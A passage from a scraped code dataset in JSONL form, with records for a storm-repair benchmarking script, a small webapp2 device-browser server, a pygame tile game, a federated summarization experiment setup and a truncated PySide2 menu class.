CLEAR_LAST_LINE = (\n \"\\033[A \\033[A\"\n )\n\n\ndef main() -> None:\n ############################################################################\n ########################### Mass Benchmarking ##############################\n ############################################################################\n\n # Parameters for Graphs and Partitions\n num_graphs: int = 100\n num_nodes: int = 201 # 20 agents * 10 nodes per agent + start\n metric = True\n upper: float = 1.0 # Travel time between 0.5-1 hour\n node_w: tuple[int, int] = (1, 1500)\n num_agents: int = 20\n\n print(\"Generating graphs\")\n graph_bank: list[Graph] = benchmark.generate_graph_bank(\n count=num_graphs, n=num_nodes, metric=metric, upper=upper, node_w=node_w\n )\n\n print(\"Seeing start location weight to 0\")\n for g in graph_bank:\n g.node_weight[0] = 0\n\n print(\"Adding repair times\")\n for g in graph_bank:\n # Ranges from \"Predicting Outage Restoration ...\"\n for v in range(num_nodes):\n pop: int = g.node_weight[v]\n if pop <= 10:\n repair_time: float = random.uniform(2, 4)\n elif pop <= 100:\n repair_time = random.uniform(2, 6)\n elif pop <= 1000:\n repair_time = random.uniform(3, 8)\n else:\n repair_time = random.uniform(5, 10)\n for u in range(num_nodes):\n if u != v:\n g.edge_weight[u][v] += repair_time\n\n print(\"Generating initial partitions\")\n partition_bank: list[list[set[int]]] = benchmark.generate_agent_partitions(\n graph_bank, num_agents\n )\n\n # Mass benchmark of graphs given bank\n # Need to edit the ranges\n # If metric: do (upper / 2, upper)\n benchmark_results: list[DefaultDict[Any, Any]] = benchmark.mass_benchmark(\n graph_bank, partition_bank, (0.5, 1.0)\n )\n\n # Write to files\n names: list[str] = [\n \"maximums\",\n \"wait_times\",\n \"times\",\n \"minimums\",\n \"sums\",\n \"ranges\",\n \"averages\",\n \"bests\",\n ]\n for res, name in zip(benchmark_results, names):\n with open(\n f\"results/mass_benchmark/{name}.json\", \"w\", encoding=\"utf-8\"\n ) as outfile:\n json.dump(res, outfile)\n\n # Box Plot for sum of weighted latencies\n with open(\"results/mass_benchmark/sums.json\", encoding=\"utf-8\") as file:\n sums: dict[str, list[float]] = json.load(file)\n\n results: list[str] = [\n \"Greedy Assignment\",\n \"Nearest Neighbor Assignment\",\n \"Greedy + Random (25%) Assignment\",\n \"Transfers and Swaps 
Greedy\",\n \"Transfers and Swaps Nearest Neighbor\",\n ]\n\n boxes: list[list[float]] = [sums[name] for name in results]\n colors: list[str] = [\"royalblue\", \"aqua\", \"blue\", \"limegreen\", \"darkgreen\"]\n\n fig, ax = plt.subplots(figsize=(6, 6))\n\n bp = ax.boxplot(boxes, patch_artist=True)\n for patch, color in zip(bp[\"boxes\"], colors):\n patch.set_facecolor(color)\n for median in bp[\"medians\"]:\n median.set(color=\"black\", linewidth=3)\n\n frame1 = plt.gca()\n frame1.axes.xaxis.set_ticklabels([\"GA\", \"NNA\", \"GRA\", \"TSG\", \"TSNN\"])\n ax.tick_params(axis=\"both\", which=\"major\", labelsize=20)\n ax.tick_params(axis=\"both\", which=\"minor\", labelsize=20)\n plt.suptitle(\"Sum of Weighted Latencies\", fontsize=20)\n plt.gcf().axes[0].yaxis.get_major_formatter().set_scientific(False)\n fig.savefig(\"results/mass_benchmark/total_work\", bbox_inches=\"tight\")\n\n # Bar Plot for average wait times\n with open(\"results/mass_benchmark/wait_times.json\", encoding=\"utf-8\") as file:\n wait: dict[str, list[float]] = json.load(file)\n\n boxes = [wait[name] for name in results]\n colors = [\"royalblue\", \"aqua\", \"blue\", \"limegreen\", \"darkgreen\"]\n\n fig, ax = plt.subplots(figsize=(6, 6))\n\n bp = ax.boxplot(boxes, patch_artist=True)\n for patch, color in zip(bp[\"boxes\"], colors):\n patch.set_facecolor(color)\n for median in bp[\"medians\"]:\n median.set(color=\"black\", linewidth=3)\n\n frame1 = plt.gca()\n frame1.axes.xaxis.set_ticklabels([\"GA\", \"NNA\", \"GRA\", \"TSG\", \"TSNN\"])\n ax.tick_params(axis=\"both\", which=\"major\", labelsize=20)\n ax.tick_params(axis=\"both\", which=\"minor\", labelsize=20)\n plt.suptitle(\"Average Wait Time (Hours)\", fontsize=20)\n plt.gcf().axes[0].yaxis.get_major_formatter().set_scientific(False)\n fig.savefig(\"results/mass_benchmark/wait_time\", bbox_inches=\"tight\")\n\n # Bar Plot for ranges\n with open(\"results/mass_benchmark/ranges.json\", encoding=\"utf-8\") as file:\n ranges: dict[str, list[float]] = json.load(file)\n\n boxes = [ranges[name] for name in results]\n colors = [\"royalblue\", \"aqua\", \"blue\", \"limegreen\", \"darkgreen\"]\n\n fig, ax = plt.subplots(figsize=(6, 6))\n\n bp = ax.boxplot(boxes, patch_artist=True)\n for patch, color in zip(bp[\"boxes\"], colors):\n patch.set_facecolor(color)\n for median in bp[\"medians\"]:\n median.set(color=\"black\", linewidth=3)\n\n frame1 = plt.gca()\n frame1.axes.xaxis.set_ticklabels([\"GA\", \"NNA\", \"GRA\", \"TSG\", \"TSNN\"])\n ax.tick_params(axis=\"both\", which=\"major\", labelsize=20)\n ax.tick_params(axis=\"both\", which=\"minor\", labelsize=20)\n plt.suptitle(\"Range of Weighted Latencies\", fontsize=20)\n plt.gcf().axes[0].yaxis.get_major_formatter().set_scientific(False)\n fig.savefig(\"results/mass_benchmark/ranges\", bbox_inches=\"tight\")\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "leadcatlab/MWLP-Storm-Repair", "sub_path": "mass_benchmark.py", "file_name": "mass_benchmark.py", "file_ext": "py", "file_size_in_byte": 6164, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "graph.Graph", "line_number": 48, "usage_type": "name"}, {"api_name": "benchmark.generate_graph_bank", "line_number": 48, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 62, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 64, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 66, "usage_type": "call"}, {"api_name": "random.uniform", 
"line_number": 68, "usage_type": "call"}, {"api_name": "benchmark.generate_agent_partitions", "line_number": 74, "usage_type": "call"}, {"api_name": "typing.DefaultDict", "line_number": 81, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 81, "usage_type": "name"}, {"api_name": "benchmark.mass_benchmark", "line_number": 81, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 100, "usage_type": "call"}, {"api_name": "json.load", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.suptitle", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "json.load", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.suptitle", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 153, "usage_type": "name"}, {"api_name": "json.load", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.suptitle", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 175, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}]} +{"seq_id": "6843533028", "text": "import webapp2\nfrom utils import *\nfrom device import DeviceInterface\nimport json\nimport sys\nfrom paste import httpserver\nfrom paste.urlparser import StaticURLParser\nfrom paste.cascade import Cascade\nfrom socket import error as SocketError\nimport os\nimport urllib\n\nSCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))\n_global_Device = DeviceInterface()\n_log = CLogger(__name__)\nTEST_PAGE = 'test'\n\nclass ElemsList(Handler):\n def get(self):\n _log.info('GET /elems?elem=%s'%self.request.get('elem'))\n if not _global_Device.loaded():\n return self.response.write('[]')\n elem = str(self.request.get('elem')).strip()\n if not elem:\n return self.response.write('[]')\n result = json.dumps(_global_Device.getLocs(elem))\n return self.response.write(result)\n\nclass NodePage(Handler):\n def get(self):\n _log.info('GET /show?gid=%s&elem=%s&x=%s&y=%s&z=%s&i=%s'%(self.request.get('gid'),\n self.request.get('elem'),\n 
self.request.get('x'),\n self.request.get('y'),\n self.request.get('z'),\n self.request.get('i')))\n if not _global_Device.loaded():\n _log.warning('New Node page requested but device not yet loaded!')\n return self.redirect('/')\n\n gid = str(self.request.get('gid')).strip()\n if gid and gid.isdigit():\n node = _global_Device.getNode(int(gid))\n return self.render('show.html',\n part=_global_Device.part(),\n node=node,\n num_fanins=len(node.fanins()),\n num_fanouts=len(node.fanouts()))\n\n elem = str(self.request.get('elem')).strip()\n x = str(self.request.get('x'))\n y = str(self.request.get('y'))\n z = str(self.request.get('z'))\n i = str(self.request.get('i'))\n\n if elem and x and x.isdigit() \\\n and y and y.isdigit() \\\n and z and z.isdigit() \\\n and i and i.isdigit():\n node = _global_Device.lookup(elem,\n int(x),\n int(y),\n int(z),\n int(i))\n if node:\n return self.render('show.html',\n part=_global_Device.part(),\n node=node,\n num_fanins=len(node.fanins()),\n num_fanouts=len(node.fanouts()))\n\n error = urllib.urlencode({'error' : 'Could not find that node!'})\n _log.warning('Could not find requested node')\n return self.redirect('/?' + error)\n\nclass MainPage(Handler):\n def renderDeviceLoader(self):\n pdevice_map = _global_Device.getDeviceMap()\n pdevice_map_str = json.dumps(pdevice_map)\n return self.render('device.html',\n device_map = pdevice_map,\n device_map_str = pdevice_map_str)\n\n def renderNewNode(self):\n error_header = self.request.get('error')\n return self.render('node.html',\n part=_global_Device.part(),\n error_header=error_header,\n elem_list = _global_Device.getElems())\n\n def get(self):\n _log.info('GET /')\n if not _global_Device.loaded():\n return self.renderDeviceLoader()\n else:\n return self.renderNewNode()\n\n def post(self):\n _log.info('POST /')\n part = str(self.request.get('part')).strip()\n if part:\n _log.info('Loading device %s'%part)\n _global_Device.load(part)\n _log.info('Finished loading device')\n return self.redirect('/')\n\nclass TestPage(Handler):\n def get(self):\n _log.info('GET /%s'%TEST_PAGE)\n return self.response.write('OK')\n\n\ndef main():\n host = sys.argv[1]\n port = sys.argv[2]\n global TEST_PAGE\n\n if len(sys.argv) > 3:\n TEST_PAGE = sys.argv[3]\n\n web_app = webapp2.WSGIApplication([\n ('/', MainPage),\n ('/show', NodePage),\n ('/%s'%TEST_PAGE, TestPage),\n ('/elems', ElemsList)\n ], debug=True)\n static_app = StaticURLParser((os.path.join(SCRIPT_DIR, \"static\")))\n\n # Create a cascade that looks for static files first, then tries the webapp\n app = Cascade([static_app, web_app])\n try:\n httpserver.serve(app, host=host, port=port)\n except SocketError:\n _log.critical('Failed to start webserver at http://%s:%s'%(host, port))\n exit(-1)\n\nif __name__ == '__main__':\n main()\n", "repo_name": "smukherj1/gusafir", "sub_path": "gusafir_server.py", "file_name": "gusafir_server.py", "file_ext": "py", "file_size_in_byte": 4422, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 13, "usage_type": "call"}, {"api_name": "device.DeviceInterface", "line_number": 14, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 26, "usage_type": "call"}, {"api_name": "urllib.urlencode", "line_number": 72, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 
79, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 114, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 115, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 118, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 119, "usage_type": "attribute"}, {"api_name": "webapp2.WSGIApplication", "line_number": 121, "usage_type": "call"}, {"api_name": "paste.urlparser.StaticURLParser", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "paste.cascade.Cascade", "line_number": 130, "usage_type": "call"}, {"api_name": "paste.httpserver.serve", "line_number": 132, "usage_type": "call"}, {"api_name": "paste.httpserver", "line_number": 132, "usage_type": "name"}, {"api_name": "socket.error", "line_number": 133, "usage_type": "name"}]} +{"seq_id": "133446390", "text": "import pygame\nimport math\nimport csv\n\nWATER = 0\nDIRT = 1\nGRASS = 2\n\nGREEN = (0,255,0)\n\ndisplay_width = 800\ndisplay_height = 600\n\nx = display_width*.45\ny = display_height*.8\nplayerSize = 20\n\nall_sprites = pygame.sprite.Group()\nmap_sprites = pygame.sprite.Group()\n\ntileset = {0:pygame.image.load('water.png'), 1:pygame.image.load('dirt.png'), 2:pygame.image.load('grass.png')}\n\npygame.init()\n\nwith open('explore_map.csv', 'r') as f:\n    reader = csv.reader(f)\n    currentmap = list(reader)\n\n\nscreen = pygame.display.set_mode((display_width,display_height))\npygame.display.set_caption('explore!')\n\nclock = pygame.time.Clock()\ncrashed = False\n\nblack = (0,0,0)\ntileSize = 20\nwhite = (255,255,255)\nplayerImg = pygame.image.load('player.png')\n\ndef player(x,y):\n\tscreen.blit(playerImg, (x,y))\n\t\ndef drawTile(tile, x, y):\n\tscreen.blit(tileset[tile], (x,y))\n\ndef drawMap(map):\n\tfor row in range(0, len(map)):\n\t\tfor tileIn in range(0, len(map[0])):\n\t\t\ttile = map[row][tileIn]\n\t\t\tx = tileIn * tileSize\n\t\t\ty = row * tileSize\n\t\t\tdrawTile(int(tile), x, y)\n\ndef loadMap(map):\n\tfor row in range(0, len(map)):\n\t\tfor tileIn in range(0, len(map[0])):\n\t\t\ttile = map[row][tileIn]\n\t\t\tif int(tile) < 2:\n\t\t\t\tx = tileIn * tileSize\n\t\t\t\ty = row * tileSize\n\t\t\t\tmap_sprites.add(Tile(int(tile), x, y))\n\n\ndef getCurrentTile(x, y):\n\trow = math.floor(y/tileSize)\n\tcol = math.floor(x/tileSize)\n\treturn currentmap[row][col]\n\nxspeed = 4\nyspeed = xspeed\ndspeed = xspeed*.75\n\nleftKey = pygame.K_a\nrightKey = pygame.K_d\nupKey = pygame.K_w\ndownKey = pygame.K_s\n\n\nkeysPressed = [0,0,0,0] #W, A, S, D (or up, left, down, right)\n\nclass Tile(pygame.sprite.DirtySprite):\n\tdef __init__(self, terrainID, x, y):\n\t\tpygame.sprite.DirtySprite.__init__(self)\n\t\tself.image = tileset[terrainID]\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.x = x\n\t\tself.rect.y = y\n\t\tself.dirty = 0\n\t\tself.defaultImage = self.image\n\nclass Player(pygame.sprite.DirtySprite):\n\tdef __init__(self):\n\t\tpygame.sprite.DirtySprite.__init__(self)\n\t\tself.image = pygame.image.load('player.png')\n\t\tself.rect = self.image.get_rect()\n\t\tself.vx = 0\n\t\tself.vy = 0\n\t\tself.lastC = Tile(0,0,0)\n\tdef update(self):\n\t\tself.vx = 0\n\t\tself.vy = 0\n\t\tif keysPressed[1] == 1:\n\t\t\tself.vx -= xspeed\n\t\tif keysPressed[3] == 1:\n\t\t\tself.vx += xspeed\n\t\tif keysPressed[0] == 1:\n\t\t\tself.vy -= yspeed\n\t\tif keysPressed[2] == 1:\n\t\t\tself.vy += yspeed\n\t\t\n\t\tif sum(keysPressed) == 
2:\n\t\t\tif self.vx != 0 and self.vy != 0:\n\t\t\t\tif self.vx > 0:\n\t\t\t\t\tself.vx = dspeed\n\t\t\t\telse:\n\t\t\t\t\tself.vx = -dspeed\n\t\t\t\tif self.vy > 0:\n\t\t\t\t\tself.vy = dspeed\n\t\t\t\telse:\n\t\t\t\t\tself.vy = -dspeed\n\t\t\n\n\t\n\t\tself.rect.x += self.vx\n\t\tself.rect.y += self.vy\n\t\n\t\t#set back player if he has crossed a screen boundary\n\t\tif self.rect.x > display_width-playerSize:\n\t\t\tself.rect.x = display_width-playerSize\n\t\tif self.rect.x < 0:\n\t\t\tself.rect.x = 0\n\t\tif self.rect.y > display_height-playerSize:\n\t\t\tself.rect.y = display_height-playerSize\n\t\tif self.rect.y < 0:\n\t\t\tself.rect.y = 0\n\t\tself.dirty = 1\n\t\t\n\t\t# collision detection\n\t\tcollideSpriteList = pygame.sprite.spritecollide(self, map_sprites, False, collided = None)\n\t\tif(collideSpriteList): #if there was a collision\n\t\t\tcollideSprite = collideSpriteList[int(len(collideSpriteList)/2)]\n\t\t\tcollideX = collideSprite.rect.x\n\t\t\tcollideY = collideSprite.rect.y\n\t\t\tcollideSprite.image = tileset[2]\n\t\t\tcollisionBuffer = playerSize\n\t\t\tif self.rect.x in range(collideX-collisionBuffer, collideX+2*collisionBuffer):\n\t\t\t\tself.rect.y -= self.vy\n\t\t\tif self.rect.y in range(collideY-collisionBuffer, collideY+2*collisionBuffer):\n\t\t\t\tself.rect.x -= self.vx\n\t\t\tself.lastC = collideSprite\n\t\telse:\n\t\t\tself.lastC.image = self.lastC.defaultImage\n\t\t\t\n\t\t\n\nplayer = Player()\n\nall_sprites.add(player)\n\n\t\nloadMap(currentmap)\n\nwhile not crashed:\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tcrashed = True\n\t\tif event.type == pygame.KEYUP:\n\t\t\tif event.key == leftKey:\n\t\t\t\tkeysPressed[1] = 0\n\t\t\tif event.key == rightKey:\n\t\t\t\tkeysPressed[3] = 0\n\t\t\tif event.key == upKey:\n\t\t\t\tkeysPressed[0] = 0\n\t\t\tif event.key == downKey:\n\t\t\t\tkeysPressed[2] = 0\n\t\tif event.type == pygame.KEYDOWN:\n\t\t\tif event.key == leftKey:\n\t\t\t\tkeysPressed[1] = 1\n\t\t\tif event.key == rightKey:\n\t\t\t\tkeysPressed[3] = 1\n\t\t\tif event.key == upKey:\n\t\t\t\tkeysPressed[0] = 1\n\t\t\tif event.key == downKey:\n\t\t\t\tkeysPressed[2] = 1\n\t\n\tscreen.fill(GREEN)\n\n\t\n\tall_sprites.update()\n\tmap_sprites.draw(screen)\n\tall_sprites.draw(screen)\n\t\n\tpygame.display.update()\n\tclock.tick(30)\n\t\npygame.quit()\nquit()", "repo_name": "snickercop/explore-game", "sub_path": "explore_dirty.py", "file_name": "explore_dirty.py", "file_ext": "py", "file_size_in_byte": 4440, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pygame.sprite.Group", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 23, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 26, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 31, "usage_type": "attribute"}, 
{"api_name": "pygame.time.Clock", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 39, "usage_type": "attribute"}, {"api_name": "math.floor", "line_number": 66, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 67, "usage_type": "call"}, {"api_name": "pygame.K_a", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 82, "usage_type": "attribute"}, {"api_name": "pygame.sprite.DirtySprite.__init__", "line_number": 84, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 92, "usage_type": "attribute"}, {"api_name": "pygame.sprite.DirtySprite.__init__", "line_number": 94, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 94, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 95, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 95, "usage_type": "attribute"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 140, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 140, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 165, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 165, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 166, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 168, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 177, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 194, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 194, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 197, "usage_type": "call"}]} +{"seq_id": "18554101111", "text": "import os\r\nimport pickle\r\nimport torch\r\nfrom hypothesis.BERTSUMEXT import ExtSummarizer\r\nfrom moudle.dataset import get_CNNDM_dataset, get_WikiHow_dataset, get_GovernmentReport_dataset, get_PubMed_dataset\r\nfrom moudle.dataloader import get_FL_dataloader\r\nfrom tool.logger import *\r\n\r\n\r\ndef Experiment_Create_dataset(param_dict):\r\n dataset_name = [i.strip().lower() for i in param_dict['dataset_name'].split(\",\")]\r\n data_path = []\r\n get_dataset = []\r\n\r\n if \"CNNDM\".lower() in dataset_name:\r\n # data_path = \"./dataset/CNNDM\"\r\n # get_dataset = get_CNNDM_dataset\r\n data_path.append(\"./dataset/CNNDM\")\r\n get_dataset.append(get_CNNDM_dataset)\r\n\r\n if \"WikiHow\".lower() in dataset_name:\r\n # data_path = \"./dataset/WikiHow\"\r\n # get_dataset = get_WikiHow_dataset\r\n data_path.append(\"./dataset/WikiHow\")\r\n get_dataset.append(get_WikiHow_dataset)\r\n\r\n if \"GovernmentReport\".lower() in dataset_name:\r\n # data_path = \"./dataset/GovernmentReport\"\r\n # get_dataset = get_GovernmentReport_dataset\r\n data_path.append(\"./dataset/GovernmentReport\")\r\n get_dataset.append(get_GovernmentReport_dataset)\r\n\r\n if \"PubMed\".lower() in dataset_name:\r\n # data_path = \"./dataset/PubMed\"\r\n # get_dataset = get_PubMed_dataset\r\n data_path.append(\"./dataset/PubMed\")\r\n 
get_dataset.append(get_PubMed_dataset)\r\n\r\n training_dataset = []\r\n validation_dataset = []\r\n testing_dataset = []\r\n for i in range(len(data_path)):\r\n g = get_dataset[i]\r\n d = data_path[i]\r\n\r\n # training_dataset.append(g(d, \"train\", only_one=False))\r\n # validation_dataset.append(g(d, \"valid\", only_one=False))\r\n # testing_dataset.append(g(d, \"test\", only_one=False))\r\n training_dataset.append(g(d, \"train\", only_one=True))\r\n validation_dataset.append(g(d, \"valid\", only_one=True))\r\n testing_dataset += g(d, \"test\", only_one=True)\r\n\r\n\r\n\r\n return training_dataset, validation_dataset, testing_dataset\r\n\r\n\r\ndef Experiment_Create_dataloader(param_dict, training_dataset, validation_dataset, testing_dataset, split_strategy=\"Uniform\"):\r\n num_clients_K = param_dict['num_clients_K']\r\n batch_size = param_dict['batch_size']\r\n\r\n # 一类数据被存储到list的一个项中\r\n data_field_number = len(training_dataset)\r\n\r\n if data_field_number == 1:\r\n training_dataloaders, client_dataset_list = get_FL_dataloader(\r\n training_dataset[-1], num_clients_K, split_strategy=split_strategy,\r\n do_train=True, batch_size=batch_size, num_workers=0, do_shuffle=True\r\n )\r\n\r\n validation_dataloaders, _ = get_FL_dataloader(\r\n validation_dataset[-1], num_clients_K, split_strategy=split_strategy,\r\n do_train=True, batch_size=batch_size, num_workers=0, do_shuffle=True\r\n )\r\n\r\n else:\r\n training_dataloaders = []\r\n client_dataset_list = []\r\n validation_dataloaders = []\r\n\r\n filed_size = [num_clients_K // data_field_number for i in range(data_field_number)]\r\n filed_size[-1] += num_clients_K % data_field_number\r\n\r\n for i in range(data_field_number):\r\n td, cd = get_FL_dataloader(\r\n training_dataset[i], filed_size[i], split_strategy=split_strategy,\r\n do_train=True, batch_size=batch_size, num_workers=0, do_shuffle=True\r\n )\r\n\r\n vd, _ = get_FL_dataloader(\r\n validation_dataset[i], filed_size[i], split_strategy=split_strategy,\r\n do_train=True, batch_size=batch_size, num_workers=0, do_shuffle=True\r\n )\r\n\r\n training_dataloaders += td\r\n client_dataset_list += cd\r\n validation_dataloaders += vd\r\n\r\n testing_dataloader = get_FL_dataloader(\r\n testing_dataset, num_clients_K, split_strategy=\"Uniform\",\r\n do_train=False, batch_size=batch_size, num_workers=0\r\n )\r\n\r\n return training_dataloaders, validation_dataloaders, client_dataset_list, testing_dataloader\r\n\r\n\r\ndef Experiment_Create_model(param_dict):\r\n if \"BERTSUMEXT\".lower() in param_dict['hypothesis'].lower():\r\n logger.info(\"Model construction (BERTSUMEXT)\")\r\n model = ExtSummarizer(classifier_type=param_dict['classifier_type'])\r\n else:\r\n logger.info(\"Model construction (AREDSUM)\")\r\n model = None\r\n model.to(param_dict['device'])\r\n return model\r\n\r\n\r\ndef Experiment_Reload_model(checkpoint_path):\r\n model = torch.load(checkpoint_path)\r\n return model", "repo_name": "AllenMa97/pFedSum", "sub_path": "moudle/experiment_setup.py", "file_name": "experiment_setup.py", "file_ext": "py", "file_size_in_byte": 4550, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "moudle.dataset.get_CNNDM_dataset", "line_number": 19, "usage_type": "argument"}, {"api_name": "moudle.dataset.get_WikiHow_dataset", "line_number": 25, "usage_type": "argument"}, {"api_name": "moudle.dataset.get_GovernmentReport_dataset", "line_number": 31, "usage_type": "argument"}, {"api_name": 
"moudle.dataset.get_PubMed_dataset", "line_number": 37, "usage_type": "argument"}, {"api_name": "moudle.dataloader.get_FL_dataloader", "line_number": 66, "usage_type": "call"}, {"api_name": "moudle.dataloader.get_FL_dataloader", "line_number": 71, "usage_type": "call"}, {"api_name": "moudle.dataloader.get_FL_dataloader", "line_number": 85, "usage_type": "call"}, {"api_name": "moudle.dataloader.get_FL_dataloader", "line_number": 90, "usage_type": "call"}, {"api_name": "moudle.dataloader.get_FL_dataloader", "line_number": 99, "usage_type": "call"}, {"api_name": "hypothesis.BERTSUMEXT.ExtSummarizer", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "72385834364", "text": "# coding: utf-8\n\nfrom PySide2 import QtCore, QtWidgets, QtGui\n\nimport functools\n\nimport numpy as np\n\nimport constants as cst\nimport config as cfg\nfrom datasets import fit_data\nfrom datasets import timeseries_features as ts_features\n\n\nclass FeaturesMenu(QtWidgets.QPushButton):\n\n def __init__(self, text, prefix='', exclude_names=False):\n QtWidgets.QPushButton.__init__(self, text)\n\n self.features_desc = ts_features.load_features_desc()\n self.features_groups = self.features_desc['GROUPS']\n\n self.models_names = fit_data.timeseries_models_names\n\n if prefix:\n if prefix[-1] != ' ':\n prefix += ' '\n text = prefix + text[0].lower() + text[1:]\n self.features_button = QtWidgets.QPushButton(text)\n self.features_menu = QtWidgets.QMenu(\"Features\", self.features_button)\n self.features_menu.setToolTipsVisible(True)\n\n self.features_list = []\n self.features_submenus = dict()\n self.models_submenus = dict()\n self.features_actions = dict()\n\n # Top-level features: DEFAULT and NAMES\n for feat_id, _, description in cfg.features.iterateFeatures(description=True, append_formula=True):\n if exclude_names or (feat_id not in ('.DEFAULT', '.NAMES')):\n break\n self.features_list.append(feat_id)\n self.features_actions[feat_id] = QtWidgets.QAction(description, self)\n self.features_menu.addAction(self.features_actions[feat_id])\n\n # Generic submenus\n for group, description in self.features_groups.items():\n self.features_submenus[group] = self.features_menu.addMenu(description)\n self.features_submenus[group].setToolTipsVisible(True)\n # Models submenu\n for model, description in self.models_names.items():\n model_menu = self.features_submenus['MODELS']\n self.models_submenus[model] = model_menu.addMenu(description)\n self.models_submenus[model].setToolTipsVisible(True)\n\n # Generic features\n for feat_id, _, description in cfg.features.iterateFeatures(description=True, append_formula=True):\n if feat_id in ('.DEFAULT', '.NAMES'):\n continue # already done above\n self.features_list.append(feat_id)\n try:\n group, feat = feat_id.split('.')\n # print(group, feat)\n self.features_actions[feat_id] = QtWidgets.QAction(description, self)\n if group:\n # Feature in a group\n self.features_submenus[group].addAction(self.features_actions[feat_id])\n else:\n # Top-level feature, e.g. 
